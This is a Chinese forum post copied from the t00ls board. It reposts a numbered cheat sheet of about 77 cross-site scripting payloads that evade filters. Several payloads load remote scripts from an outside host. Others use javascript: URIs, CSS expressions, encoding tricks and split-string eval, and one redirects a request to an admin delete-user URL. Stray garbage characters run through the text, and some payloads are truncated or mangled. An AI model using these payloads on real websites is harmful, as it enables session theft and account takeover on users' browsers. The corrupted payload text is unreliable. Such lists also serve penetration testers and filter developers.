貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
$ ]6 t+ s) {4 G6 w/ ^/ ^ a(1)普通的XSS JavaScript注入( j# `# K, w+ x6 o( e' o( n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" x$ y9 B3 o8 h* h# o) I
(2)IMG标签XSS使用JavaScript命令1 S- D, z" t5 W4 C
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># z9 B3 U# ?4 [$ x1 t
(3)IMG标签无分号无引号
1 G" d7 f( G3 j U- P7 ]" ?" R<IMG SRC=javascript:alert(‘XSS’)>
" K# C1 d/ K3 H* z/ [% q4 S. @(4)IMG标签大小写不敏感
) O/ j8 A0 I' N: A! Y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% n4 @" j5 V/ j- l(5)HTML编码(必须有分号)
9 y8 ~0 \7 M+ E& E& U" q$ {<IMG SRC=javascript:alert(“XSS”)>* J0 o8 H2 U. s; S% ?7 D
(6)修正缺陷IMG标签
) V/ p# a' h. H7 K<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>( [4 C5 d+ H6 c9 E" {
4 Y9 y1 K$ u/ k) D* s* \4 H, U
7 O s* `' B' u. z( f. L
(7)formCharCode标签(计算器): O0 f4 p9 |) Q R, s
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
% J! q H- v% F5 R" h4 }3 a: T(8)UTF-8的Unicode编码(计算器)9 @. T5 D. Z! \/ q. m0 S
<IMG SRC=jav..省略..S')>
+ O& x) ^8 y! T. c9 h, v(9)7位的UTF-8的Unicode编码是没有分号的(计算器) `' C& h; W+ ~/ B7 Z
<IMG SRC=jav..省略..S')># x. {7 s, }6 `) @% \
(10)十六进制编码也是没有分号(计算器)) |: P, j0 c' C- {" s
<IMG SRC=java..省略..XSS')>
+ k- ^* f0 U1 F8 ^4 S0 b$ t6 s; ~(11)嵌入式标签,将Javascript分开
1 `& `) l1 X4 V. n; T$ [) d ?<IMG SRC=”jav ascript:alert(‘XSS’);”>
- e" }, n: c/ p i- o0 k+ Y) C(12)嵌入式编码标签,将Javascript分开
! \" | M9 }% {; [<IMG SRC=”jav ascript:alert(‘XSS’);”>7 Z: N* c. |( `
(13)嵌入式换行符
4 V$ c4 V: _7 |9 O: B2 w, C3 W<IMG SRC=”jav ascript:alert(‘XSS’);”>
* G. U! |, S G(14)嵌入式回车" ~ U, o4 f. n0 `) ]; R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, R5 O# {: i1 K! @: s, S(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 @5 { F4 W2 o1 S$ e<IMG SRC=”javascript:alert(‘XSS‘)”># s# L0 h+ b& D* Y. @
(16)解决限制字符(要求同页面)
" F5 M! t7 G7 `# Q0 m<script>z=’document.’</script>
$ A% W$ p* ~3 U' ~* A, J2 p1 ]<script>z=z+’write(“‘</script>; e/ |4 ]" i: e( a! \! Y
<script>z=z+’<script’</script>& U) u/ p$ p, G2 H) }* \8 [
<script>z=z+’ src=ht’</script>" Z1 `% N2 p/ a( C! d
<script>z=z+’tp://ww’</script>
9 G1 W' c- K8 C. x* [9 c<script>z=z+’w.shell’</script>
; V7 _, r/ q/ p% L* B5 ?3 r<script>z=z+’.net/1.’</script>; W) a# h7 W% L; j( D
<script>z=z+’js></sc’</script>/ D. n0 k- Y& h! n4 z. i$ o
<script>z=z+’ript>”)’</script>9 c: e: o5 h K7 B( q o& v
<script>eval_r(z)</script>% k* c% [1 Q( f7 x
(17)空字符12-7-1 T00LS - Powered by Discuz! Board- F: _$ q: U5 C; M8 v/ t" S- N5 A
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
$ M. K( P# B Kperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out, y9 [9 P0 F8 ?0 Z) W" R
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. [: l i6 {3 X0 v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
, J+ D+ i/ a5 Y/ w! R: D(19)Spaces和meta前的IMG标签
, B& i- s k% y<IMG SRC=” javascript:alert(‘XSS’);”>$ Z8 M. v5 J( _7 u4 W! k' G
(20)Non-alpha-non-digit XSS- F% c7 ^2 q, t6 w( D
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ h( W' U x/ e9 D
(21)Non-alpha-non-digit XSS to 2
( c# ?% C& G- x/ E! w. [8 o<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 N2 x( D* }' J6 U
(22)Non-alpha-non-digit XSS to 36 q* N( L6 o1 n
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>. H: h% u# @. x9 x/ g, w. @
(23)双开括号
# w5 D6 q, m6 I0 x0 P) W. v, v/ i( U- |<<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 E& u5 i5 G% N(24)无结束脚本标记(仅火狐等浏览器)
- S' X) e! C; }) c: e- C6 K<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
$ y+ A% R2 S4 u. E$ {2 K(25)无结束脚本标记2 h' w3 \5 F: k1 Y/ x0 S
<SCRIPT SRC=//3w.org/XSS/xss.js>- r: M! T. F/ F4 g1 M
(26)半开的HTML/JavaScript XSS
; u+ i' }. |& Q: R8 E<IMG SRC=”javascript:alert(‘XSS’)”
2 q& Z$ u5 Z% H* G$ C: R(27)双开角括号9 f& k- W8 Z6 l4 y* U% o; ^8 }+ N
<iframe src=http://3w.org/XSS.html </ _2 [, L- T% k' I
(28)无单引号 双引号 分号
: _4 I: S3 e2 `! I) u4 W2 T<SCRIPT>a=/XSS/
& l7 @3 t3 j8 k/ {alert(a.source)</SCRIPT>
, H' i% w0 f0 P# F(29)换码过滤的JavaScript$ C. e2 j Y$ B/ C
\”;alert(‘XSS’);//& p( N9 u" ~8 I$ Q$ ] z
(30)结束Title标签9 w* [ d) v/ }
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% d0 w' Q) _7 u) I3 [(31)Input Image" t7 d3 l* t$ @8 V
<INPUT SRC=”javascript:alert(‘XSS’);”>5 I5 P1 b e; {
(32)BODY Image6 J: v9 c- g9 u+ `6 Y" ]
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
) `/ K; c" }) n) b: ](33)BODY标签
' z% T2 D+ }8 `5 a4 h; p/ L<BODY(‘XSS’)>
" A; a( A$ \# I' Q- \(34)IMG Dynsrc
% @. d9 y" Y. S) q. T/ P9 q<IMG DYNSRC=”javascript:alert(‘XSS’)”>6 I+ F* e# @3 Y' b) U9 _3 e
(35)IMG Lowsrc
: c2 u/ P/ j1 B5 X' F<IMG LOWSRC=”javascript:alert(‘XSS’)”>4 K" J) ^; v7 U* Y+ \: o% w
(36)BGSOUND
3 t: k" A4 U+ B/ |, U5 p<BGSOUND SRC=”javascript:alert(‘XSS’);”>
! _9 R5 U! ~) i+ a2 U0 r(37)STYLE sheet
( Q# x/ C! _' Z1 p<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>+ T0 Q! ^$ d7 L( ^4 |! H5 H% T, U
(38)远程样式表
" w; L' k0 s4 [: V<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 H5 Y3 s3 u; H
(39)List-style-image(列表式). w; U; g9 D9 p8 B# z8 |
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
1 |* {$ y$ o' H# d' R(40)IMG VBscript
! i: y1 }: ~: t, G) ~2 r8 }4 J<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
9 U e3 m( u: n/ W. @! f* A9 X. q(41)META链接url. l* I T* @; b$ v9 i0 F3 _+ B) B, y
& r% w3 z- X! Y2 E
7 w% X: l `6 t
<META HTTP-EQUIV=”refresh” CONTENT=”0;
% E5 V7 ?. ?6 c4 jURL=http://;URL=javascript:alert(‘XSS’);”>
. R: ]( i9 h, G' z5 j(42)Iframe! R S1 y5 @ O2 g
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
" I, D% M# w6 ~+ G$ x, n(43)Frame3 W: {" O$ m) e! T+ S0 F
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board# e m2 _3 n1 p
https://www.t00ls.net/viewthread ... table&tid=15267 3/6+ u6 C% q7 x% s; S
(44)Table# M( r- O$ w( {5 J* U1 ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
, T; j9 X# h( v' g(45)TD
% h1 ?: U b6 c<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
- e4 h7 O0 [$ \(46)DIV background-image
/ C8 K" A% ?- x" M, O* \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' m y" l. v8 P, I6 N, S
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-, q0 @; c9 |+ @1 U3 @! H
8&13&12288&65279)& T2 s) v) Z0 _7 q9 s6 q, r2 R$ i1 `
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
" v- g/ s! [1 m0 _9 s(48)DIV expression
6 G* C0 c4 Z6 Q" n- q. I) @<DIV STYLE=”width: expression_r(alert(‘XSS’));”>3 z' q P) J3 o9 u4 g0 N; S6 j
(49)STYLE属性分拆表达( I" j! k8 I& ~2 R( Q
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>' U! Z5 J+ G3 b2 D! e4 g
(50)匿名STYLE(组成:开角号和一个字母开头)/ b3 a5 u/ Z8 T& L( M
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 a9 ]. [8 K0 h$ L' m O+ e% ^. h(51)STYLE background-image1 w+ H, r- n+ o# O1 J# ^0 l
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
8 {. M8 z4 f& f& XCLASS=XSS></A>
+ M: E. e' ^& t3 c- s$ C# w(52)IMG STYLE方式6 A; A* N0 Z( g4 j% ~
exppression(alert(“XSS”))’>
7 @) T; q; X( X4 p+ W( T(53)STYLE background0 ^6 J3 o7 {& y! g
<STYLE><STYLE
& A# x v# @: k' @2 Otype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>8 |6 F) S$ H% W" E3 N* x4 H9 l
(54)BASE
' I9 X& v7 {3 A/ w. W2 j<BASE HREF=”javascript:alert(‘XSS’);//”>6 l6 o* J. n) Y" z6 k0 o: m
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( w" g0 ^3 w+ ?; |
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>8 h( ~9 o6 d0 e( l
(56)在flash中使用ActionScrpt可以混进你XSS的代码8 F) f2 l9 e( f7 c6 R2 n; A
a=”get”;
Y' [& Y6 s& x9 ob=”URL(\”";- p! m) b" R+ T6 e
c=”javascript:”;4 ?" l# r% ~( j9 j# ~+ L" f
d=”alert(‘XSS’);\”)”;# y- Q v6 B; V! o% F0 Z
eval_r(a+b+c+d);% Y: e$ R# i4 f
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; T; W" b% j2 O% h# \0 h<HTML xmlns:xss>$ G4 }! }+ }' S/ e. s
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>' ^" W9 |: D$ e9 l5 O0 V* B1 o% L
<xss:xss>XSS</xss:xss>
* ^3 J5 Z/ O9 z5 }: d3 @( Z</HTML>$ t1 Z% }! N) S- w' O
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* F( J+ K3 u; z, f( [$ l' r<SCRIPT SRC=””></SCRIPT>" ^" W1 j* g3 P. r% h! y/ L: b
(59)IMG嵌入式命令,可执行任意命令' A0 r- m/ g6 P6 H( \- |
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
: w* R* s1 u7 L(60)IMG嵌入式命令(a.jpg在同服务器)% y$ ?/ l s- k1 i
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
4 V1 c% s4 \2 p$ b+ d( D: W(61)绕符号过滤' b0 ]/ j& r2 s/ i& D2 m
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 v2 I0 T% p" I+ X' Y! H(62)7 M! @) ]! i2 }( b/ y3 _* D
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 F* _( L, X$ Y5 ?
(63)1 u; Y6 p D7 ]. p v% H8 @2 [* o
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! ^' b1 T! a2 K+ n; |! j
(64)
0 f* Q/ X2 J& S3 b( `8 \; f1 n<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>& s, g7 ~ o6 d
(65) B1 I* r% Q. R. V X* z) q& H8 O
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
; B4 S% O# K+ @& I/ e2 k9 l(66)12-7-1 T00LS - Powered by Discuz! Board
6 V7 R% @: \, [2 ehttps://www.t00ls.net/viewthread ... table&tid=15267 4/6; h7 f& o% o. w, [
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>2 q% f3 b( x) z; C6 _
(67)( S: N9 a1 v0 j3 d) V5 l
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
' T- R; C3 D# m. n5 z, G7 i</SCRIPT>
" G) d( v) ^1 z; C; a; y$ ~(68)URL绕行2 m7 M% }1 B2 M9 S
<A HREF=”http://127.0.0.1/”>XSS</A># ~1 V- j3 R( M+ C' |5 G, X
(69)URL编码
# E' p9 L# q! v3 M<A HREF=”http://3w.org”>XSS</A>
, ?3 B) e- c- w/ r- k(70)IP十进制2 I, Y) p2 E9 J5 m. a- O! |
<A HREF=”http://3232235521″>XSS</A>2 \( i2 v4 N3 _: ^- T4 r
(71)IP十六进制
. I( J0 A; c+ m9 R( c<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>, }/ S2 q/ G( `+ J% \
(72)IP八进制2 {3 a1 {! N: H+ s
<A HREF=”http://0300.0250.0000.0001″>XSS</A>* i2 r- M: t0 a9 ~! ?0 E
(73)混合编码
8 ^0 R& f8 F# ^$ P& t<A HREF=”h
0 \5 y: i2 A( E+ D5 ett p://6 6.000146.0×7.147/”">XSS</A>
/ |. x; ~+ M. `; r(74)节省[http:]/ a$ W# Q: e- u6 Z- r; W
<A HREF=”//www.google.com/”>XSS</A>
5 y/ R b+ o* {2 R' n(75)节省[www]$ l) m/ V6 ]1 c s3 q7 {
<A HREF=”http://google.com/”>XSS</A>( K+ P: E. J4 v8 u7 L0 Z
(76)绝对点绝对DNS
/ j3 w% f% Q- I& T0 g<A HREF=”http://www.google.com./”>XSS</A>+ I8 Z$ n! Q% S/ Z$ t( l. }% Z
(77)javascript链接1 _7 F1 H0 D5 ]# w' J5 _
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>; n( q4 ^3 i* i4 C& k$ S1 t
/ {6 L3 l a$ S# O
原文地址:http://fuzzexp.org/u/0day/?p=14
- T/ B& Z! O" I+ c7 {5 A" o0 {0 u- p7 H# b1 j# ^. s
|
发表于 2013-4-19 19:22:37
收藏
支持
反对